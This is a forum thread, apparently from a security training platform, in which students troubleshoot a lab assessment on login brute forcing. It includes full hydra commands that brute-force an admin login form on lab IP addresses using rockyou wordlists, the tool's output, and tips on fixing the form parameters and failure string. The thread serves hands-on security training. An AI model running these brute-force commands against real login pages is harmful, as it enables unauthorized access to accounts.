Login Brute Forcing

I’m on the Login Brute Forcing - Skills Assessment - website - 2nd question. I was able to get past the first authentication page, and am now on the Admin Panel page. I’ve used Burp to get the Post form data. I’ve run the command to crack the password, and I get a success. But then the user name/password doesn’t work. I run it again, and it cracks a different password. I’ve reset my VM and my target… I don’t know what to do, each time I run the command I get a different password and none of them work.

$hydra -l admin -P /opt/useful/SecLists/Passwords/Leaked-Databases/rockyou.txt -f 144.126.234.86 -s 32429 http-post-form “/admin_login.php:username=^USER^&password=^PASS^:F=<form name=‘login’”

It’s given me:

login: admin password: 123456789
[STATUS] attack finished for 144.126.234.86 (valid pair found)
1 of 1 target successfully completed, 1 valid password found

host: 144.126.234.86 login: admin password: 12345
[STATUS] attack finished for 144.126.234.86 (valid pair found)
1 of 1 target successfully completed, 1 valid password found

host: 144.126.234.86 login: admin password: iloveyou
[STATUS] attack finished for 144.126.234.86 (valid pair found)
1 of 1 target successfully completed, 1 valid password found

Any suggestions?

Double check your parameter names and your fail string.

Also use the rockyou-50.txt wordlist. The whole list isn’t needed. Let me know where you get after that!
-onthesauce

1 Like

Ah, I see my mistake now. Thanks - sorry it took a while to try again at this, but I appreciate your help.

1 Like

I am quite sure I am doing all good, but I just found 16 useless password like the three you found. Maybe I am wrong on the fail string?

Here the command I am using:

hydra -l admin -P SecurityEnvironment/Wordlists/SecLists/Passwords/Leaked-Databases/rockyou-50.txt 134.209.17.36 -s 30942 http-post-form “/admin_login.php:user=^USER^&pass=^PASS^:F=<form name=‘log-in’”

look at the hint, the user you should be cracking is ‘user